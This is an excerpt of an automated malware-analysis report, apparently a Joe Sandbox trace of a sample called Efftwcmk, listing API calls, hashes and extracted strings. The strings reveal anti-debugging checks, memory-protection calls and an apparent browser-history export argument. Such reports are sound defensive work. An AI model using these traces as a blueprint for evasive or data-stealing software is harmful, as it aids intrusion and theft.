                                                      • Opcode Fuzzy Hash: 2d25666de7f9f87afc24e46b330590e30263787cc905a1580beb3cdc45f9e717
                                                      • Instruction Fuzzy Hash: 4241D771A84304AFE3259F78CC40B9E7BA8EF84710F20853AE605FB2D0D671A98187E0
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,2D294F50), ref: 2D224DB3
                                                      • CreateThread.KERNEL32(00000000,00000000,?,2D294EF8,00000000,00000000), ref: 2D224DC7
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224DD2
                                                      • CloseHandle.KERNEL32(00000000), ref: 2D224DDB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 3360349984-771429351
                                                      • Opcode ID: 3731ed543e87eb0ed8991613fb8c5b161e6c32015117c3082c97586c7891fb92
                                                      • Instruction ID: 37639d5c407cf24a4bf1ade0411ef854cfdad7bb9d0f7e2d758266287619cce3
                                                      • Opcode Fuzzy Hash: 3731ed543e87eb0ed8991613fb8c5b161e6c32015117c3082c97586c7891fb92
                                                      • Instruction Fuzzy Hash: 2941C37128C7016FD715EB60CC58EBFB7EDEFA5710F00092DF592A2290DF25A909C661
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,2D25F8C8,?,00000000,?,00000001,?,000000FF,00000001,2D25F8C8,?), ref: 2D271179
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2D271202
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 2D271214
                                                      • __freea.LIBCMT ref: 2D27121D
                                                        • Part of subcall function 2D266137: RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 2652629310-771429351
                                                      • Opcode ID: 7e4338b139794563491ffefb1c1842cee4794e77519c5026d7fe5f5b57f17318
                                                      • Instruction ID: d77f1414ea1b245fb5f9d026d4c05a9a777cc32cbb2affcbc968466b07bd309a
                                                      • Opcode Fuzzy Hash: 7e4338b139794563491ffefb1c1842cee4794e77519c5026d7fe5f5b57f17318
                                                      • Instruction Fuzzy Hash: 9031E371A4122A9BEF26CF65CC44EAF7BB5EF40610F014168ED04EB294E735D951CB90
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C7358A
                                                      • RegQueryValueExA.ADVAPI32 ref: 02C735BD
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C735D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                      • API String ID: 3677997916-4173385793
                                                      • Opcode ID: 963985fd024f13be878af30f4f155e415d33284cf1acebd2991f3a30fcdae973
                                                      • Instruction ID: 6ecff730b15fa39bc5630043eaa6f363b546635efb732c54c31982037b297aeb
                                                      • Opcode Fuzzy Hash: 963985fd024f13be878af30f4f155e415d33284cf1acebd2991f3a30fcdae973
                                                      • Instruction Fuzzy Hash: 9001D475A44388BAFB11DB90CD42FBD77ECEB08B10F1005B2BA05D7580E6799A10EB99
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,2D294EF8), ref: 2D225120
                                                      • SetEvent.KERNEL32(?), ref: 2D22512C
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 2D225137
                                                      • CloseHandle.KERNEL32(?), ref: 2D225140
                                                        • Part of subcall function 2D23B4EF: GetLocalTime.KERNEL32(00000000), ref: 2D23B509
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                      • String ID: KeepAlive | Disabled
                                                      • API String ID: 2993684571-305739064
                                                      • Opcode ID: df0c238d50e27f948690f9a3fabd17e80df68b2cd90144650d5b89d5213c5cbf
                                                      • Instruction ID: 858b8b53a59757767a886abc75e5a0cf4742c677ef6415ee55d6bfc17f9ccae1
                                                      • Opcode Fuzzy Hash: df0c238d50e27f948690f9a3fabd17e80df68b2cd90144650d5b89d5213c5cbf
                                                      • Instruction Fuzzy Hash: 0BF024718487407FEB203B74CD0EB3B7EADFB27610F008418F982B23A2D5259400CB66
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2D27F234), ref: 2D2693CF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,2D292764,000000FF,00000000,0000003F,00000000,?,?), ref: 2D269447
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,2D2927B8,000000FF,?,0000003F,00000000,?), ref: 2D269474
                                                      • _free.LIBCMT ref: 2D2693BD
                                                        • Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
                                                        • Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA
                                                      • _free.LIBCMT ref: 2D269589
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 301291800e0fc99d1ff697af4bf9892c97dcd2dd3e15aa9b6bffd6707f9cf908
                                                      • Instruction ID: 0e34946e01ccb9b1c923cf1df991ea685b3c551216961ae139cbde7e0bceaca9
                                                      • Opcode Fuzzy Hash: 301291800e0fc99d1ff697af4bf9892c97dcd2dd3e15aa9b6bffd6707f9cf908
                                                      • Instruction Fuzzy Hash: A151D571844319ABCB04DF64CC84DEAB7BCEF45754F61426AE614B7280EB349A81CBF0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 032306b1845e31982509cd438bd85712ccf142e7277b703f9f2819ceb958c650
                                                      • Instruction ID: 827873319260457950771b5a21ea176f234e72af95b8ab5f5e4117877812333a
                                                      • Opcode Fuzzy Hash: 032306b1845e31982509cd438bd85712ccf142e7277b703f9f2819ceb958c650
                                                      • Instruction Fuzzy Hash: 6D41A136A403149BCB14CF78CD80A5EB3B5EF84714F1641A9D665FB281DA31A941CBE0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,00000000,?,2D25BC87,00000000,?,?,2D25BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 2D26829E
                                                      • _free.LIBCMT ref: 2D2682D3
                                                      • _free.LIBCMT ref: 2D2682FA
                                                      • SetLastError.KERNEL32(00000000), ref: 2D268307
                                                      • SetLastError.KERNEL32(00000000), ref: 2D268310
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0f5a6d0496854c2063c440b964f419d060518067265996dd0b6562475fc66dcd
                                                      • Instruction ID: 66c24f8da70169a4794d794a6cd7d242c6b71b590254d0aea3c9d2659e6fa432
                                                      • Opcode Fuzzy Hash: 0f5a6d0496854c2063c440b964f419d060518067265996dd0b6562475fc66dcd
                                                      • Instruction Fuzzy Hash: A001D63A5C87816693131A254C88E6B6529EFD2AB5F214139FA14B23C1FF64C9C149F8
                                                      APIs
                                                      • GetThreadLocale.KERNEL32(?,00000000,02C7AA5F,?,?,00000000), ref: 02C7A9E0
                                                        • Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A
                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C7AA5F,?,?,00000000), ref: 02C7AA10
                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A914,00000000,00000000,00000004), ref: 02C7AA1B
                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C7AA5F,?,?,00000000), ref: 02C7AA39
                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A950,00000000,00000000,00000003), ref: 02C7AA44
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                      • String ID:
                                                      • API String ID: 4102113445-0
                                                      • Opcode ID: ba2f50d62c52073ad5bc5edca6965858a6220d43feb42ed5991bed68531c15c1
                                                      • Instruction ID: 5a5e7e71c8b117a6fcb2510d07186e84a611d36a923532124f983d466e5ebefd
                                                      • Opcode Fuzzy Hash: ba2f50d62c52073ad5bc5edca6965858a6220d43feb42ed5991bed68531c15c1
                                                      • Instruction Fuzzy Hash: F701F2712806446FF701A6748D12F6E736DDB46B30FA10170F500A66D0E6349F00ABA4
                                                      APIs
                                                      • _free.LIBCMT ref: 2D2709D4
                                                        • Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
                                                        • Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA
                                                      • _free.LIBCMT ref: 2D2709E6
                                                      • _free.LIBCMT ref: 2D2709F8
                                                      • _free.LIBCMT ref: 2D270A0A
                                                      • _free.LIBCMT ref: 2D270A1C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 55e90d3591cfa4bf57f5887efb58729ccfd620a962851276a59b38fd2ddb97eb
                                                      • Instruction ID: 8d90e6d1675c02fa3fcc06394e5fccf4f6e3f40918503d1d1d7acb8ac5498783
                                                      • Opcode Fuzzy Hash: 55e90d3591cfa4bf57f5887efb58729ccfd620a962851276a59b38fd2ddb97eb
                                                      • Instruction Fuzzy Hash: 3DF04F31488211A7D621DA59EAC5D6B33F9EB64B16F7189A9E268F7600CA34FCC046A4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 0-771429351
                                                      • Opcode ID: 8cfcc61ab3f6050cecf1dc8c69c2adb974dfe3aa4c4bf2a1470c7fe638315fee
                                                      • Instruction ID: 8f66995de1c235c2342be705182664909ba1249cb19ac552b6d5e98c9709d72d
                                                      • Opcode Fuzzy Hash: 8cfcc61ab3f6050cecf1dc8c69c2adb974dfe3aa4c4bf2a1470c7fe638315fee
                                                      • Instruction Fuzzy Hash: 1251AD7199430AAECB018FA4CC44FAF7BB8FF55354F514169E900B7291EA34AA81CBF0
                                                      APIs
                                                      • GetThreadLocale.KERNEL32(?,00000000,02C7AC48,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C7AAA7
                                                        • Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$InfoThread
                                                      • String ID: eeee$ggg$yyyy
                                                      • API String ID: 4232894706-1253427255
                                                      • Opcode ID: 5a6228dc98b6a3f74ca840c9bd6c000728f2ecf725eb267db893a7ad2488ae0e
                                                      • Instruction ID: 63a564faf9551d3996158af098400e9a8fd818a293162d5bd164a16ce7843419
                                                      • Opcode Fuzzy Hash: 5a6228dc98b6a3f74ca840c9bd6c000728f2ecf725eb267db893a7ad2488ae0e
                                                      • Instruction Fuzzy Hash: B641F1703049055BD726AB79C9802BEF3FBEB85340F644626D462C7344E735DE06EA21
                                                      APIs
                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C8D086
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CheckConnectionInternet
                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                      • API String ID: 3847983778-3852638603
                                                      • Opcode ID: 600ac77fe761e00c31ab13b7ee1ce0b8ef13f884fc8221810fc6cc1ba381c58e
                                                      • Instruction ID: ef63f25ccf7c9f4ab1231c36a9f6c207648ba26a483a0b3744ee8f44dec70dbb
                                                      • Opcode Fuzzy Hash: 600ac77fe761e00c31ab13b7ee1ce0b8ef13f884fc8221810fc6cc1ba381c58e
                                                      • Instruction Fuzzy Hash: F3411075B501089FEB24FBA4D841A9EB7FAEF88314F218432E051E7290DB74AD06AF55
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,Pk)-N)-,2D26BB7E,?,00000000,FF8BC35D), ref: 2D26B8D2
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 2D26B900
                                                      • GetLastError.KERNEL32 ref: 2D26B931
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 2456169464-771429351
                                                      • Opcode ID: b6a93801bbca26ff9fcf8169cbda4a4a58fe345db948c966412ad415a54c7449
                                                      • Instruction ID: 219aa4eae458b46d252900c22b7697aa2a0d7d453a05692dd542b322441a8dbf
                                                      • Opcode Fuzzy Hash: b6a93801bbca26ff9fcf8169cbda4a4a58fe345db948c966412ad415a54c7449
                                                      • Instruction Fuzzy Hash: 98315E75A403199FDB14CF59DC85AEAB7B8EB08704F1044B9E90AE7250DA30AE80CFA0
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 2D224066
                                                        • Part of subcall function 2D23B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,2D22407C), ref: 2D23B99F
                                                        • Part of subcall function 2D238568: CloseHandle.KERNEL32(2D2240F5), ref: 2D23857E
                                                        • Part of subcall function 2D238568: CloseHandle.KERNEL32(t^(-), ref: 2D238587
                                                        • Part of subcall function 2D23C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 2D23C49E
                                                      • Sleep.KERNEL32(000000FA,2D285E74), ref: 2D224138
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                      • String ID: /sort "Visit Time" /stext "$0N)-
                                                      • API String ID: 368326130-1302915440
                                                      • Opcode ID: 28ab1ec9ec5aa841c152793d42a5ce35175a756454f5c5eca92e0ea8be1af798
                                                      • Instruction ID: 56efef560b573543cf3975370ca70dceafd57dba4863f82dc61f06ca78b28d28
                                                      • Opcode Fuzzy Hash: 28ab1ec9ec5aa841c152793d42a5ce35175a756454f5c5eca92e0ea8be1af798
                                                      • Instruction Fuzzy Hash: 3D31663198862857CB15EBB4DCD9EEE7375EFB1200F410079F616B7194EF206E4ACA91
                                                      APIs
                                                      • GetLocalTime.KERNEL32(00000000), ref: 2D23B509
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: | $%02i:%02i:%02i:%03i $Pk)-N)-
                                                      • API String ID: 481472006-3445371248
                                                      • Opcode ID: ef56da97ef1bce76ff2e539b948c553160e4aa7ef4477a89e3fea354130a4958
                                                      • Instruction ID: 827027e8f45011abf6559d739aeb453ee762c8c9cf05a64609ac9f163a9905f3
                                                      • Opcode Fuzzy Hash: ef56da97ef1bce76ff2e539b948c553160e4aa7ef4477a89e3fea354130a4958
                                                      • Instruction Fuzzy Hash: CE11817244C65456C305DB61DC889BFB3E8EF64600F510939F695A21D0EF28EA49C666
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 2D224F81
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 2D224FCD
                                                      • CreateThread.KERNEL32(00000000,00000000,2D225150,?,00000000,00000000), ref: 2D224FE0
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 2D224F94
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$EventLocalThreadTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 2532271599-1507639952
                                                      • Opcode ID: 785074a16ba2cb8694c3f199ea63e9112b23782ed109bbcc20750287f6d48fa2
                                                      • Instruction ID: 7fbf2f6f62ce6fe73616254d24432b28d6cf4125feac54192a0eb0bee81dabfe
                                                      • Opcode Fuzzy Hash: 785074a16ba2cb8694c3f199ea63e9112b23782ed109bbcc20750287f6d48fa2
                                                      • Instruction Fuzzy Hash: 2E11E0318446846AD721AA76CC4CFAB7FBCEBE7A10F00411EF54172251DA74A146CBB2
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 2D26C28C
                                                      • GetLastError.KERNEL32 ref: 2D26C296
                                                      • __dosmaperr.LIBCMT ref: 2D26C29D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 2336955059-771429351
                                                      • Opcode ID: e5d0344a4ad99ed31c446b5d518b5c951649c5c27693e834a2dba08d8d2f462c
                                                      • Instruction ID: 78ea961edae9fde1b22fbca37f8b779729e3ce14cee6a8b070982fdc2d92f37e
                                                      • Opcode Fuzzy Hash: e5d0344a4ad99ed31c446b5d518b5c951649c5c27693e834a2dba08d8d2f462c
                                                      • Instruction Fuzzy Hash: A2012D32654215ABDF059FE9CC4499E3B29FB86230B240259ED10B7290FA31D98097F0
                                                      APIs
                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,2D294EF8,2D294EF8,Pk)-N)-,2D224A40), ref: 2D23CB09
                                                      • LocalFree.KERNEL32(?,?), ref: 2D23CB2F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FormatFreeLocalMessage
                                                      • String ID: @J"-$Pk)-N)-
                                                      • API String ID: 1427518018-590280348
                                                      • Opcode ID: 2ed9e8296d94dc045660ef4044f3372f76ef479d31c441b0e1ad9be2d06b3797
                                                      • Instruction ID: c9d087f8d4b29693f5a884377ec2c255170a4334703955fe3a8e2b9ad8d11a5a
                                                      • Opcode Fuzzy Hash: 2ed9e8296d94dc045660ef4044f3372f76ef479d31c441b0e1ad9be2d06b3797
                                                      • Instruction Fuzzy Hash: 1EF0FF70A44109AADB1897A5CC4EEFFB73DDFA8201F00403AB605B2180EE616E159625
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C8D5E0
                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C8D5F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                      • API String ID: 1646373207-539270669
                                                      • Opcode ID: 73a5328825a58e6e1d9c8b4c9b2ccfa6d42736c24315d459dae0243617560b98
                                                      • Instruction ID: 9f170175e3e64c7616a1a00c9ba6514cf1468bfc4b49a5f534ec621b880d1f3e
                                                      • Opcode Fuzzy Hash: 73a5328825a58e6e1d9c8b4c9b2ccfa6d42736c24315d459dae0243617560b98
                                                      • Instruction Fuzzy Hash: 2EF0A03090464CAADB11BAF888887DCFBAD5B0532CF648794A43A621C1E77107808795
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02C879C5
                                                      • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02C879CB
                                                      Strings
                                                      • NtProtectVirtualMemory, xrefs: 02C879BB
                                                      • C:\Windows\System32\ntdll.dll, xrefs: 02C879C0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                      • API String ID: 1646373207-1386159242
                                                      • Opcode ID: 7e7666b382b1986447caf8be049284a019b5833dff2d9c751de71c9d93913240
                                                      • Instruction ID: eecc970a5dcfe8cee9c0a815fd89bebefbd07fe93f564d62e6c6a9934078d84d
                                                      • Opcode Fuzzy Hash: 7e7666b382b1986447caf8be049284a019b5833dff2d9c751de71c9d93913240
                                                      • Instruction Fuzzy Hash: 3BE08CB6680208BF9B40EF9CEC80ECB37ECAB1C3407008814FA19C3200C631E9619FB0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02C8D778,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D57A
                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent,KernelBase,?,02C8D778,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D58C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
